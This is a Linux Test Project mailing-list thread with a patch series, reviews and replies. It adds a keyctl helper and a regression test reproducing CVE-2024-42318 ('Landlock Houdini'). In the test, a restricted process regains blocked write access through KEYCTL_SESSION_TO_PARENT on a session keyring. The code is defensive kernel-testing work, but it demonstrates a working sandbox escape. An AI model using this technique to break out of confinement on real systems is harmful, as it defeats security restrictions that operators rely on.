[LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug
From: Andrea Cervesato @ 2024-08-21 13:49 UTC
To: ltp
More information at:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318
Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com>
---
Changes in v3:
- verify return value of keyctl() according to the manual
- Link to v2: https://lore.kernel.org/r/20240821-landlock_houdini-v2-0-b46211ca64f9@suse.com
Changes in v2:
- add SAFE_KEYCTL macro
- verify in setup that landlock is activated
- Link to v1: https://lore.kernel.org/r/20240820-landlock_houdini-v1-1-ff3bffc93eaa@suse.com
---
Andrea Cervesato (2):
Add SAFE_KEYCTL macro
Add landlock07 test
include/lapi/keyctl.h | 49 +++++++++++
runtest/syscalls | 1 +
testcases/kernel/syscalls/landlock/.gitignore | 1 +
testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++
4 files changed, 160 insertions(+)
---
base-commit: edc79222abdcf32a344c806275a30a5c7cbf1ef3
change-id: 20240820-landlock_houdini-f244f52e87c3
Best regards,
--
Andrea Cervesato <andrea.cervesato@suse.com>
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 6+ messages in thread* [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro 2024-08-21 13:49 [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug Andrea Cervesato @ 2024-08-21 13:49 ` Andrea Cervesato 2024-08-21 15:00 ` Cyril Hrubis 2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato 1 sibling, 1 reply; 6+ messages in thread From: Andrea Cervesato @ 2024-08-21 13:49 UTC (permalink / raw) To: ltp From: Andrea Cervesato <andrea.cervesato@suse.com> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- include/lapi/keyctl.h | 49 +++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 49 insertions(+) diff --git a/include/lapi/keyctl.h b/include/lapi/keyctl.h index 3be782494..ff0a2ed22 100644 --- a/include/lapi/keyctl.h +++ b/include/lapi/keyctl.h 
@@ -179,4 +179,53 @@ static inline key_serial_t keyctl_join_session_keyring(const char *name) { # define KEY_OTH_ALL 0x0000003f #endif /* !KEY_POS_VIEW */ +static inline long safe_keyctl(const char *file, const int lineno, + int cmd, unsigned long arg2, unsigned long arg3, + unsigned long arg4, unsigned long arg5) +{ + long rval; + int failure = 0; + + rval = keyctl(cmd, arg2, arg3, arg4, arg5); + if (rval == -1) { + tst_brk_(file, lineno, TBROK | TERRNO, + "keyctl(%d, %lu, %lu, %lu, %lu)", + cmd, arg2, arg3, arg4, arg5); + } + + switch (cmd) { + case KEYCTL_GET_KEYRING_ID: + case KEYCTL_JOIN_SESSION_KEYRING: + case KEYCTL_DESCRIBE: + case KEYCTL_SEARCH: + case KEYCTL_READ: + case KEYCTL_SET_REQKEY_KEYRING: + case KEYCTL_GET_SECURITY: + case KEYCTL_GET_PERSISTENT: + case KEYCTL_DH_COMPUTE: + if (rval < 0) + failure = 1; + break; + case KEYCTL_ASSUME_AUTHORITY: + if ((!arg2 && rval) || (arg2 && rval < 0)) + failure = 1; + break; + default: + if (rval) + failure = 1; + break; + } + + if (failure) { + tst_brk_(file, lineno, TBROK, + "keyctl(%d, %lu, %lu, %lu, %lu) returned %ld", + cmd, arg2, arg3, arg4, arg5, rval); + } + + return rval; +} +#define SAFE_KEYCTL(cmd, arg2, arg3, arg4, arg5) \ + safe_keyctl(__FILE__, __LINE__, \ + (cmd), (arg2), (arg3), (arg4), (arg5)) + #endif /* LAPI_KEYCTL_H__ */ -- 2.43.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 6+ messages in thread
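Review bot: the default branch of the switch in safe_keyctl() treats every non-zero return as a failure (`if (rval) failure = 1;`), which is wrong for the keyctl commands that return a byte count on success; keyctl(2) documents KEYCTL_PKEY_ENCRYPT, KEYCTL_PKEY_DECRYPT, KEYCTL_PKEY_SIGN and KEYCTL_CAPABILITIES that way, and none of them is in the `rval < 0` case list, so SAFE_KEYCTL() on any of them would tst_brk() on a successful call. Either add them to that first case group or put a comment above the function stating that the wrapper only classifies the listed commands plus those documented to return 0. Two smaller points: the `if (rval == -1)` check with TERRNO already catches every failing call, so the later `if (rval < 0)` in the first case group is redundant and could be folded into the -1 check; and the helper carries no comment explaining that the success value is command-specific, which is the one thing that makes this wrapper differ from the usual SAFE_* pattern and is worth a sentence for the next person who adds a case.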
Re: [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro
From: Cyril Hrubis @ 2024-08-21 15:00 UTC
To: Andrea Cervesato; +Cc: ltp

Hi!

Looks good to me now:

Reviewed-by: Cyril Hrubis <chrubis@suse.cz>

--
Cyril Hrubis
chrubis@suse.cz
* [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 13:49 [LTP] [PATCH v3 0/2] Reproducer for the landlock houdini bug Andrea Cervesato 2024-08-21 13:49 ` [LTP] [PATCH v3 1/2] Add SAFE_KEYCTL macro Andrea Cervesato @ 2024-08-21 13:49 ` Andrea Cervesato 2024-08-21 15:05 ` Cyril Hrubis 1 sibling, 1 reply; 6+ messages in thread From: Andrea Cervesato @ 2024-08-21 13:49 UTC (permalink / raw) To: ltp From: Andrea Cervesato <andrea.cervesato@suse.com> This test is a reproducer for the CVE-2024-42318 bug, also known as landlock Houdini. More information at: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> --- runtest/syscalls | 1 + testcases/kernel/syscalls/landlock/.gitignore | 1 + testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ 3 files changed, 111 insertions(+) diff --git a/runtest/syscalls b/runtest/syscalls index fea0c9828..a9fc8c432 100644 --- a/runtest/syscalls +++ b/runtest/syscalls @@ -706,6 +706,7 @@ landlock03 landlock03 landlock04 landlock04 landlock05 landlock05 landlock06 landlock06 +landlock07 landlock07 lchown01 lchown01 lchown01_16 lchown01_16 diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore index 315ac1dca..db11bff2f 100644 --- a/testcases/kernel/syscalls/landlock/.gitignore +++ b/testcases/kernel/syscalls/landlock/.gitignore @@ -5,3 +5,4 @@ landlock03 landlock04 landlock05 landlock06 +landlock07 diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c new file mode 100644 index 000000000..68045da3b --- /dev/null +++ b/testcases/kernel/syscalls/landlock/landlock07.c 
@@ -0,0 +1,109 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/* + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> + */ + +/** + * [Description] + * + * CVE-2024-42318 + * + * Test to check if sysem is affected by Landlock Houdini bug: + * https://www.suse.com/security/cve/CVE-2024-42318.html + * + * Kernel bug fixed in: + * + * commit 39705a6c29f8a2b93cf5b99528a55366c50014d1 + * Author: Jann Horn <jannh@google.com> + * Date: Wed Jul 24 14:49:01 2024 +0200 + * + * landlock: Don't lose track of restrictions on cred_transfer + */ + +#include "tst_test.h" +#include "lapi/prctl.h" +#include "lapi/keyctl.h" +#include "tst_test_macros.h" +#include "landlock_common.h" + +static struct landlock_ruleset_attr *ruleset_attr; +static int ruleset_fd; + +static pid_t spawn_houdini(void) +{ + pid_t pid; + + SAFE_KEYCTL(KEYCTL_JOIN_SESSION_KEYRING, 0, 0, 0, 0); + + pid = SAFE_FORK(); + if (!pid) { + SAFE_KEYCTL(KEYCTL_JOIN_SESSION_KEYRING, 0, 0, 0, 0); + SAFE_KEYCTL(KEYCTL_SESSION_TO_PARENT, 0, 0, 0, 0); + exit(0); + } + + return pid; +} + +static void run(void) +{ + pid_t pid_houdini; + + if (SAFE_FORK()) + return; + + SAFE_PRCTL(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0); + SAFE_LANDLOCK_RESTRICT_SELF(ruleset_fd, 0); + + TST_EXP_FAIL(open("/dev/null", O_WRONLY), EACCES); + if (TST_RET != -1) { + SAFE_CLOSE(TST_RET); + return; + } + + pid_houdini = spawn_houdini(); + SAFE_WAITPID(pid_houdini, NULL, 0); + + TST_EXP_FAIL(open("/dev/null", O_WRONLY), EACCES); + if (TST_RET != -1) + SAFE_CLOSE(TST_RET); + + exit(0); +} + +static void setup(void) +{ + verify_landlock_is_enabled(); + + ruleset_attr->handled_access_fs = LANDLOCK_ACCESS_FS_WRITE_FILE; + ruleset_fd = SAFE_LANDLOCK_CREATE_RULESET( + ruleset_attr, + sizeof(struct landlock_ruleset_attr), + 0); +} + +static void cleanup(void) +{ + if (ruleset_fd != -1) + SAFE_CLOSE(ruleset_fd); +} + +static struct tst_test test = { + .test_all = run, + .setup = setup, + .cleanup = cleanup, + .forks_child = 1, + .bufs = 
(struct tst_buffers []) { + {&ruleset_attr, .size = sizeof(struct landlock_ruleset_attr)}, + {}, + }, + .caps = (struct tst_cap []) { + TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN), + {} + }, + .tags = (const struct tst_tag[]) { + {"linux-git", "39705a6c29f8"}, + {"CVE", "2024-42318"}, + {} + } +}; -- 2.43.0 -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply related [flat|nested] 6+ messages in thread
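Review bot: `static int ruleset_fd;` starts at 0, but cleanup() guards the close with `if (ruleset_fd != -1)`, so if setup() bails out before SAFE_LANDLOCK_CREATE_RULESET() (for example when verify_landlock_is_enabled() ends the test with TCONF) cleanup() will close fd 0 instead of skipping; initialise it as `static int ruleset_fd = -1;`. The [Description] block also says what the test checks but not how: a sentence noting that the Landlock-restricted child spawns a grandchild which joins a fresh session keyring and hands it back with KEYCTL_SESSION_TO_PARENT, and that on an affected kernel that credential transfer drops the parent's Landlock domain so the second open("/dev/null", O_WRONLY) succeeds, would make the meaning of a TFAIL clear to whoever reads the log. Minor: nothing in the test performs a privileged operation (no mounts, no file creation outside the test directory), so if the CAP_SYS_ADMIN entry in .caps is only there for consistency with the other landlock tests, a short comment saying so would pre-empt the question.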
* Re: [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 13:49 ` [LTP] [PATCH v3 2/2] Add landlock07 test Andrea Cervesato @ 2024-08-21 15:05 ` Cyril Hrubis 2024-08-21 17:34 ` Andrea Cervesato via ltp 0 siblings, 1 reply; 6+ messages in thread From: Cyril Hrubis @ 2024-08-21 15:05 UTC (permalink / raw) To: Andrea Cervesato; +Cc: ltp Hi! > More information at: > https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 > > Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> > --- > runtest/syscalls | 1 + > testcases/kernel/syscalls/landlock/.gitignore | 1 + > testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ > 3 files changed, 111 insertions(+) > > diff --git a/runtest/syscalls b/runtest/syscalls > index fea0c9828..a9fc8c432 100644 > --- a/runtest/syscalls > +++ b/runtest/syscalls > @@ -706,6 +706,7 @@ landlock03 landlock03 > landlock04 landlock04 > landlock05 landlock05 > landlock06 landlock06 > +landlock07 landlock07 > > lchown01 lchown01 > lchown01_16 lchown01_16 > diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore > index 315ac1dca..db11bff2f 100644 > --- a/testcases/kernel/syscalls/landlock/.gitignore > +++ b/testcases/kernel/syscalls/landlock/.gitignore > @@ -5,3 +5,4 @@ landlock03 > landlock04 > landlock05 > landlock06 > +landlock07 > diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c > new file mode 100644 > index 000000000..68045da3b > --- /dev/null > +++ b/testcases/kernel/syscalls/landlock/landlock07.c 
> @@ -0,0 +1,109 @@ > +// SPDX-License-Identifier: GPL-2.0-or-later > +/* > + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> > + */ > + > +/** > + * [Description] > + * > + * CVE-2024-42318 > + * > + * Test to check if sysem is affected by Landlock Houdini bug: ^ t Otherwise: Reviewed-by: Cyril Hrubis <chrubis@suse.cz> -- Cyril Hrubis chrubis@suse.cz -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 6+ messages in thread
* Re: [LTP] [PATCH v3 2/2] Add landlock07 test 2024-08-21 15:05 ` Cyril Hrubis @ 2024-08-21 17:34 ` Andrea Cervesato via ltp 0 siblings, 0 replies; 6+ messages in thread From: Andrea Cervesato via ltp @ 2024-08-21 17:34 UTC (permalink / raw) To: Cyril Hrubis, Andrea Cervesato; +Cc: ltp Hi! I fix the typo and push the patch to upstream. Thanks, Andrea On 8/21/24 17:05, Cyril Hrubis wrote: > Hi! >> More information at: >> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-42318 >> >> Signed-off-by: Andrea Cervesato <andrea.cervesato@suse.com> >> --- >> runtest/syscalls | 1 + >> testcases/kernel/syscalls/landlock/.gitignore | 1 + >> testcases/kernel/syscalls/landlock/landlock07.c | 109 ++++++++++++++++++++++++ >> 3 files changed, 111 insertions(+) >> >> diff --git a/runtest/syscalls b/runtest/syscalls >> index fea0c9828..a9fc8c432 100644 >> --- a/runtest/syscalls >> +++ b/runtest/syscalls >> @@ -706,6 +706,7 @@ landlock03 landlock03 >> landlock04 landlock04 >> landlock05 landlock05 >> landlock06 landlock06 >> +landlock07 landlock07 >> >> lchown01 lchown01 >> lchown01_16 lchown01_16 >> diff --git a/testcases/kernel/syscalls/landlock/.gitignore b/testcases/kernel/syscalls/landlock/.gitignore >> index 315ac1dca..db11bff2f 100644 >> --- a/testcases/kernel/syscalls/landlock/.gitignore >> +++ b/testcases/kernel/syscalls/landlock/.gitignore >> @@ -5,3 +5,4 @@ landlock03 >> landlock04 >> landlock05 >> landlock06 >> +landlock07 >> diff --git a/testcases/kernel/syscalls/landlock/landlock07.c b/testcases/kernel/syscalls/landlock/landlock07.c >> new file mode 100644 >> index 000000000..68045da3b >> --- /dev/null >> +++ b/testcases/kernel/syscalls/landlock/landlock07.c 
>> @@ -0,0 +1,109 @@ >> +// SPDX-License-Identifier: GPL-2.0-or-later >> +/* >> + * Copyright (C) 2024 SUSE LLC Andrea Cervesato <andrea.cervesato@suse.com> >> + */ >> + >> +/** >> + * [Description] >> + * >> + * CVE-2024-42318 >> + * >> + * Test to check if sysem is affected by Landlock Houdini bug: > ^ > t > > > Otherwise: > > Reviewed-by: Cyril Hrubis <chrubis@suse.cz> > -- Mailing list info: https://lists.linux.it/listinfo/ltp ^ permalink raw reply [flat|nested] 6+ messages in thread